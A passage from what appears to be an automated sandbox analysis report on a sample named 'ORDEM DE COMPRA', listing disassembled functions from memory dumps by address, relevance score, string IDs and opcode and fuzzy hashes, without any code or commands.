                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID: @`y4$x[q$x[q$x[q
                • API String ID: 0-1402900765
                • Opcode ID: f04c870499ccb83d30d2954a0debbb4a97e1cb6756ea2340a7c683e57923ab5e
                • Instruction ID: 07369222a67afdfb33085423b98f1a20c25c4bdaaf4f6ee2be3b6ff49b8095bb
                • Opcode Fuzzy Hash: f04c870499ccb83d30d2954a0debbb4a97e1cb6756ea2340a7c683e57923ab5e
                • Instruction Fuzzy Hash: F5210652A0F5851FE7A9967C08AE1B92BC4DFA766070940BBD04DC72E2ED4C6C079360
                Function 00007FFD348A07D8 Relevance: 5.1, Strings: 4, Instructions: 83COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID: @`y4$x[q$x[q$x[q
                • API String ID: 0-1402900765
                • Opcode ID: 0e9a3582508b0f84534fe06ac9fe65d770995f313a97f8022683b3cf2c375cf1
                • Instruction ID: fddbb5b9f96c87b39011ee6e365333eaa341d48a0d7ac9e5069a4ef81ce8beaa
                • Opcode Fuzzy Hash: 0e9a3582508b0f84534fe06ac9fe65d770995f313a97f8022683b3cf2c375cf1
                • Instruction Fuzzy Hash: AD110652B1F9491FE7E9967C18AF57927C5DFA7660708417BD04EC32E2ED4C6C029250
                Function 00007FFD348AB8FA Relevance: 2.7, Strings: 2, Instructions: 244COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID: _$x6q
                • API String ID: 0-3161902116
                • Opcode ID: ad4d778182150956f22bf7ac436bb63f662d8f83577be388684dfa3fa1cd68ba
                • Instruction ID: 84c93957cdab5b9223c2a7513be1da2c67800bf696e7bf127cbe82c5a8d6b046
                • Opcode Fuzzy Hash: ad4d778182150956f22bf7ac436bb63f662d8f83577be388684dfa3fa1cd68ba
                • Instruction Fuzzy Hash: B8711A6261EA8A0FE79ADB6C84B65A677E1EF56314B0801BEC14EC7193DD7CA8028350
                Function 00007FFD348A50C8 Relevance: 2.7, Strings: 2, Instructions: 166COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID: HL_H$x6q
                • API String ID: 0-2169179056
                • Opcode ID: c985f1374fce3dc608b3c4fb6b5cd29d7c0132c3a5fea7d0fba52e476fabaa84
                • Instruction ID: a7f7882972e26ff01bd606ee55de89bf97ab46c8a5e94934de227c55dd93e55b
                • Opcode Fuzzy Hash: c985f1374fce3dc608b3c4fb6b5cd29d7c0132c3a5fea7d0fba52e476fabaa84
                • Instruction Fuzzy Hash: 4941F921B0DE0A0FEB95E7AC54E96B537C1EF6E361B0401BAD64DC7292DC9D9C4293C0
                Function 00007FFD348B63B0 Relevance: 1.8, Strings: 1, Instructions: 572COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID: d
                • API String ID: 0-2564639436
                • Opcode ID: a691f360b3bcb69076a7e0075b704f84ddfcafd5026a6789b4e8f739e9e5132a
                • Instruction ID: a1f530be80898a76d4fa0337cb249405c8475c36f1ca0a2de7f62b1123c6ae24
                • Opcode Fuzzy Hash: a691f360b3bcb69076a7e0075b704f84ddfcafd5026a6789b4e8f739e9e5132a
                • Instruction Fuzzy Hash: 8E02C230618A498FDB68DF18C4A56B6B3E1FF95310F14467ED18EC3696CE79B842C782
                Function 00007FFD348A5048 Relevance: 1.6, Strings: 1, Instructions: 354COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID: L_H
                • API String ID: 0-402390507
                • Opcode ID: 66966256babe49315c4a474e22a92332984201679163113d3fd9713e023e3879
                • Instruction ID: bd804d3e9e5d8c5fb69007b3b1e224a011fb85014049509e0596cb2cafd25946
                • Opcode Fuzzy Hash: 66966256babe49315c4a474e22a92332984201679163113d3fd9713e023e3879
                • Instruction Fuzzy Hash: 9EB16A71B189498FEF94EF6CD8A5EA977E1FF69300B0501A9E409D72A2CE74EC41CB40
                Function 00007FFD348A66FB Relevance: 1.5, Strings: 1, Instructions: 283COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID: x6q
                • API String ID: 0-3747761675
                • Opcode ID: c153fe597df09dd1b24babff6f437fdcdfdce3c43176c9c279ec8738500f8cd7
                • Instruction ID: 26687ecdc2d37002f787f105f3e9d78174da8746c3096c6502e5deba2002d66d
                • Opcode Fuzzy Hash: c153fe597df09dd1b24babff6f437fdcdfdce3c43176c9c279ec8738500f8cd7
                • Instruction Fuzzy Hash: 91717A1271E9595BD751BBECA8715FA37A4DF82730B0803B7D28CD7193ED68780682A1
                Function 00007FFD349C1309 Relevance: 1.5, Strings: 1, Instructions: 269COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2188199805.00007FFD349C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD349C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd349c0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID: 8z4
                • API String ID: 0-3978882893
                • Opcode ID: 01817dbfe3a75064aa2c74ba819ebbe0915b940ed59db9b51a783eff036e4567
                • Instruction ID: 0f398388d5ea48e1bfa490b0315efa26284119d00b63039be98c8af14f667699
                • Opcode Fuzzy Hash: 01817dbfe3a75064aa2c74ba819ebbe0915b940ed59db9b51a783eff036e4567
                • Instruction Fuzzy Hash: 36710631A0DBC94FEB56DB6884B65A47BE1EF17300B0901FEC58AC71A7DA2CAC46C751
                Function 00007FFD348CE7C0 Relevance: 1.5, Strings: 1, Instructions: 232COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID: \K_^
                • API String ID: 0-1839214671
                • Opcode ID: 6e142e1ab7288c37d11135b91c1a765f6753f81be768ada0f4830320ac4620f6
                • Instruction ID: f9b56e7f5137b943baa2a7be8ec47d7d1c3b8411b3c1bf2eef079d6301d56c00
                • Opcode Fuzzy Hash: 6e142e1ab7288c37d11135b91c1a765f6753f81be768ada0f4830320ac4620f6
                • Instruction Fuzzy Hash: A9710231A0EA965FF761D72890E4BF6B7D1EF17318F0806B9C18EC7586DA6CA885D340
                Function 00007FFD348A5F90 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID: |K_H
                • API String ID: 0-960899616
                • Opcode ID: 85d480285d8e268d3cf5138499528ad67cd5b00c623a87219415b8e0f8cdf6fa
                • Instruction ID: d95071b2e8c47cda0ec4a778b63aae05bb6c73699c1c30978280a116b4b9c3d7
                • Opcode Fuzzy Hash: 85d480285d8e268d3cf5138499528ad67cd5b00c623a87219415b8e0f8cdf6fa
                • Instruction Fuzzy Hash: 2551D321B1CA0A4BEB98DB5894B67B473D1EF5A314F0441BBD51EC7282DD2CAC868740
                Function 00007FFD348A50B5 Relevance: 1.4, Strings: 1, Instructions: 145COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID: x6q
                • API String ID: 0-3747761675
                • Opcode ID: 2e287408c52924d8baa3f3249bb0279cb4755bb4abe8986d0bad0ce590b3ead4
                • Instruction ID: b49d21e260bda60479771f8e4040f589730cf419428777c56e30bfc7c0f153ad
                • Opcode Fuzzy Hash: 2e287408c52924d8baa3f3249bb0279cb4755bb4abe8986d0bad0ce590b3ead4
                • Instruction Fuzzy Hash: 6541593070DA0A4FE768ABAC98A6A7677C0FF57350B14017ED54EC3192ED69FC029284
                Function 00007FFD349C1419 Relevance: 1.4, Strings: 1, Instructions: 143COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2188199805.00007FFD349C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD349C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd349c0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID: 8z4
                • API String ID: 0-3978882893
                • Opcode ID: 5bb2a1ad33c1a61ea264d069ff375cd9815977cad7fb595d1d9689e4a496bd4c
                • Instruction ID: 285448d515b3f06eefc5755926d5ac7242a856fbd498ae6bf14566116e3ecef7
                • Opcode Fuzzy Hash: 5bb2a1ad33c1a61ea264d069ff375cd9815977cad7fb595d1d9689e4a496bd4c
                • Instruction Fuzzy Hash: 99410832A0CA894FDB56DF28C4A64A87BE1FF17300B4501BED54AC7196DF2DAC41C791
                Function 00007FFD348A50E8 Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID: =L_E
                • API String ID: 0-1628471104
                • Opcode ID: 3545a34fc76d8653da873abf654841f99d5d690c8c8b0d39ee5f7db8d58bf4ea
                • Instruction ID: 8264f96deaef63f324d1e5b8501dc6552ab91c0e5f16830dcf8429e99e4d4f7c
                • Opcode Fuzzy Hash: 3545a34fc76d8653da873abf654841f99d5d690c8c8b0d39ee5f7db8d58bf4ea
                • Instruction Fuzzy Hash: 0B41572071DA8A0FE799A7A888B8671BBD1EF97354B5900BFC54DC7193DC1C9C428340
                Function 00007FFD348A50D8 Relevance: 1.3, Strings: 1, Instructions: 73COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID: =L_E
                • API String ID: 0-1628471104
                • Opcode ID: 62770d7746007b3f88ec1cbd98f555f6669ea5ecfff34ab3ac707a1e07e24fd7
                • Instruction ID: f14800703e651405248dbf4c0bf9c079a064cd47d48f6bdbf00b418ff7df118a
                • Opcode Fuzzy Hash: 62770d7746007b3f88ec1cbd98f555f6669ea5ecfff34ab3ac707a1e07e24fd7
                • Instruction Fuzzy Hash: E411591671DD490FF799AAAC49E96B2B6D1DB9B2A0B14027BD58EC3297DC1C6C024290
                Function 00007FFD348A64D0 Relevance: .9, Instructions: 865COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0a8a07f8a00738aadc2605027543fe21d5c72ae6244b0412bce68dd5415304b3
                • Instruction ID: 7c57cb56ba6406c5616068f6888a1485182f681f9dbdda84e42a5182c86431fe
                • Opcode Fuzzy Hash: 0a8a07f8a00738aadc2605027543fe21d5c72ae6244b0412bce68dd5415304b3
                • Instruction Fuzzy Hash: BC422622B0DA860FEBA99B6C44B55B57BD1EF96354B0840FED48EC7183DD6CAC0693C1
                Function 00007FFD348A4BFA Relevance: .8, Instructions: 828COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 831b95ddf69476275b3fbea4ef3f7498eace0733975cf2ca83bd6284307940d7
                • Instruction ID: b6fafbdf8df6e8019c82111f09bad78eab4d8706d08c73f3e02e4167599a4b31
                • Opcode Fuzzy Hash: 831b95ddf69476275b3fbea4ef3f7498eace0733975cf2ca83bd6284307940d7
                • Instruction Fuzzy Hash: 8E320822B0EA8A1FE7A99B2C58B56747BD1EF96314B0841FEC54DC7297DD5CAC068380
                Function 00007FFD348D6338 Relevance: .7, Instructions: 700COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c372b663d8d4cf5a2d081b906072d7626a0654fcf604ca17d8111e2e9e196629
                • Instruction ID: ad5a061c4fb9b5bb0b93698df32a31799ce8ff5a0042ff50135eefc33364a92d
                • Opcode Fuzzy Hash: c372b663d8d4cf5a2d081b906072d7626a0654fcf604ca17d8111e2e9e196629
                • Instruction Fuzzy Hash: A922062160EB854FE756EB2888B16657BF1EF57300B1942EAD089C71E3DD2CAC46C792
                Function 00007FFD348AB428 Relevance: .6, Instructions: 628COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b3d265148c58f468ef86c4cbed722c297ccf303d9f42e42eab5c1b933ecec43c
                • Instruction ID: 9ba2ca9316316f46eb049abd58b1310f55f698df412a2a66f2d801870b33e55b
                • Opcode Fuzzy Hash: b3d265148c58f468ef86c4cbed722c297ccf303d9f42e42eab5c1b933ecec43c
                • Instruction Fuzzy Hash: CE123530A0DB854FE768DB28C4A1571B7E0FF96304B1446BED58AC7293DE69F842C781
                Function 00007FFD348AC600 Relevance: .4, Instructions: 450COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 64f7a7f77ee804af3e5196760a34b37d2f54692e8dd2528cbbeb8dba54749a59
                • Instruction ID: 5bf3ce351aefe15bdd19a95fe3b601874203874c802c5c4d6e891a0ed4bc1e55
                • Opcode Fuzzy Hash: 64f7a7f77ee804af3e5196760a34b37d2f54692e8dd2528cbbeb8dba54749a59
                • Instruction Fuzzy Hash: 86D1F622B0EA8A0FE7D6DB2C84B867477D1EF96210B0901FAD14DC72A3DE6CAC459351
                Function 00007FFD348B4950 Relevance: .4, Instructions: 396COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4261df4305202ac223a5a60e4087b9eb715a77cd7c7e8225bb2d1a17791fdd0f
                • Instruction ID: 02b3f000e85fd7af44720d248c90ab77b3f34a14376d7885bd4d6b359bc18224
                • Opcode Fuzzy Hash: 4261df4305202ac223a5a60e4087b9eb715a77cd7c7e8225bb2d1a17791fdd0f
                • Instruction Fuzzy Hash: EEB1F0307099094FEBE5EB2C94A977877E1FF9A701B1401FAD14DC72A6CE69EC418381
                Function 00007FFD348A3CFA Relevance: .3, Instructions: 336COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 09dfcfab8613f6563a0b12f87bba22ba0a228542ac2483e6aff1a065ae3e71cc
                • Instruction ID: 3be80a15977e3b129ad995b919d475520cdf4f357f3d3860ba16ad5c7358d950
                • Opcode Fuzzy Hash: 09dfcfab8613f6563a0b12f87bba22ba0a228542ac2483e6aff1a065ae3e71cc
                • Instruction Fuzzy Hash: B1B10532F0EA894FDB85DB6C98B11E977F1EF8A310F08017BD948D7292DA6868058761
                Function 00007FFD348AA3E8 Relevance: .3, Instructions: 331COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dd26bb94e5b4f9c3ceff3c9f1308ed14bf0e64362647434f3899c74a1bbe61df
                • Instruction ID: c392b0fd2772e5a70bad4834523b8172d0818d1eab61930412ac4ca5f8f46107
                • Opcode Fuzzy Hash: dd26bb94e5b4f9c3ceff3c9f1308ed14bf0e64362647434f3899c74a1bbe61df
                • Instruction Fuzzy Hash: 6491553171CB454FEB189B1C98968B577E0EF96320B1402BED58AC32A3DD69B847C7C2
                Function 00007FFD348A1CF0 Relevance: .3, Instructions: 310COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ca3cf4e4a644bfb3c7a08c102877394a4e1a7f1edaf2dc44f893479d59b03834
                • Instruction ID: 41d46ea9c8b1289ed8e3e566424bdd148434f15b4aa8c36e507dda2f6376e6d8
                • Opcode Fuzzy Hash: ca3cf4e4a644bfb3c7a08c102877394a4e1a7f1edaf2dc44f893479d59b03834
                • Instruction Fuzzy Hash: BC813A53B0ED4A0FEBE9A75C64A52B563D1EF9976070402F7E80EC728ADD69EC4643C0
                Function 00007FFD348A6984 Relevance: .3, Instructions: 308COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1a189457ef989823355d04afc293132adf5daf0ad53ef010973d3d0b8b9ef260
                • Instruction ID: 44b8734c3eca390f948c96e986b0be29bc72260bd559c73a20aec70c1d8b88b8
                • Opcode Fuzzy Hash: 1a189457ef989823355d04afc293132adf5daf0ad53ef010973d3d0b8b9ef260
                • Instruction Fuzzy Hash: F6A15E35718A458FCB98EB58C0A19A573E2FFA9304B5441ADE04EC36A6DE34F846CB80
                Function 00007FFD348A3ACD Relevance: .3, Instructions: 293COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1fdb3fcf9a0ef12aa648bda61c2dc590e43798e7305e5b3e58973e54014d568e
                • Instruction ID: f3a64139d1a03bfc7d7cd78f097a70b8a754391ed045eeba0a94f6ae1e5f70b5
                • Opcode Fuzzy Hash: 1fdb3fcf9a0ef12aa648bda61c2dc590e43798e7305e5b3e58973e54014d568e
                • Instruction Fuzzy Hash: 58915230B18A098FDB98EF1CD495A78B7E1FF5A305B100179E54EC7692DE25EC42DB41
                Function 00007FFD348AB438 Relevance: .3, Instructions: 277COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 86d40609e7eff606dd13d34bafef526f1624e3fa7f36dbfbf2b7fe115129fb7a
                • Instruction ID: 91492d7139b5f1d2df29706604684c6fac92947c4f3b71426074d957eaae84b8
                • Opcode Fuzzy Hash: 86d40609e7eff606dd13d34bafef526f1624e3fa7f36dbfbf2b7fe115129fb7a
                • Instruction Fuzzy Hash: C181BD30A18E494FE768DF18C495575B3E0FBA9308B104A7DD68EC3696DE79F8428BC1
                Function 00007FFD348A6318 Relevance: .3, Instructions: 274COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f71d7a6eddd4bd3fb408f73042809c02fc1fed4ae2ea529ec9d0adf906be7664
                • Instruction ID: 085763d59dafac00ec1e3d933979266c39f4dd01d67571be5571ca823e232121
                • Opcode Fuzzy Hash: f71d7a6eddd4bd3fb408f73042809c02fc1fed4ae2ea529ec9d0adf906be7664
                • Instruction Fuzzy Hash: 4781E612B0D5561BE761BBFC65B11FA67A4DF42324B0C52B7D18CD6193EC7CB8868290
                Function 00007FFD348BE974 Relevance: .3, Instructions: 273COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fcb081795643eb74aa03503bc88bd9635da44e8fc5c1eed0dd94f77f2af9000f
                • Instruction ID: da474139ab8e260e2c989468f02b96444f0438d3193567b2aff3478738997061
                • Opcode Fuzzy Hash: fcb081795643eb74aa03503bc88bd9635da44e8fc5c1eed0dd94f77f2af9000f
                • Instruction Fuzzy Hash: 9181B621B1DE494FEBE9DB2C98E56B937D1FFAA300B0400BAD14DC7292DD5CAC469781
                Function 00007FFD348A6CAD Relevance: .3, Instructions: 270COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4af8ed48efbae9561917eb4281f6b19d8dd73782e568c01a5eb98fe0cb730845
                • Instruction ID: 17e21889fee6066aa2a9a493ccc417f9b36dd11e6a2b1c26a1036e770fbab355
                • Opcode Fuzzy Hash: 4af8ed48efbae9561917eb4281f6b19d8dd73782e568c01a5eb98fe0cb730845
                • Instruction Fuzzy Hash: 5E916F61A0E68A5FE786EBB884B62A97BE1EF56310F1401FAC08DD71D7CD6C6C42C351
                Function 00007FFD348B5F80 Relevance: .3, Instructions: 268COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d0a02374d23b4a1594a02d2f03b62fe998515678b9fe7e5ce2298a12725ba3f9
                • Instruction ID: 2168d157742259379574c788d757edbaf60722a579b3a6c45936a1adc1283e1e
                • Opcode Fuzzy Hash: d0a02374d23b4a1594a02d2f03b62fe998515678b9fe7e5ce2298a12725ba3f9
                • Instruction Fuzzy Hash: 5C714531618F094FEB58DF1CD8969B573E0EF96311B14027EE549C32A2DE69B846C7C2
                Function 00007FFD348ADA81 Relevance: .3, Instructions: 265COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 75aa6c2a46d8de244873232ff6f435ddea60dd792f32ed399823af618a467a44
                • Instruction ID: dc0d4072275c9e2a89553e4be52c81d080f0c498af504e4a2b79c8614c95304c
                • Opcode Fuzzy Hash: 75aa6c2a46d8de244873232ff6f435ddea60dd792f32ed399823af618a467a44
                • Instruction Fuzzy Hash: BF712431B0EA4A0FE399DB2888A557577E2EF87314B0442BED58EC3293DD6CE8038351
                Function 00007FFD348A4FF5 Relevance: .2, Instructions: 250COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 271cc15d566f154be82703f95a1c3bdc10507789e90ae8cafb64cdf864a7bd2a
                • Instruction ID: 87274fdd9f622aac13f3c9389f3367f7534bf52d323981901167b9bacc5e33e6
                • Opcode Fuzzy Hash: 271cc15d566f154be82703f95a1c3bdc10507789e90ae8cafb64cdf864a7bd2a
                • Instruction Fuzzy Hash: 7061D63170DA094FE7C8EB1CD499A7973D1EF9A324B0401BED44EC72A2DE69EC428780
                Function 00007FFD348A5470 Relevance: .2, Instructions: 241COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 348adcf413c4a85a158b5dcf51faf0da588d89c70763173942f9c05bdf8be63b
                • Instruction ID: bda07063b3c6c8ef1796a0fc297db0da27d5f017e87564ae29279c734e0a4f1e
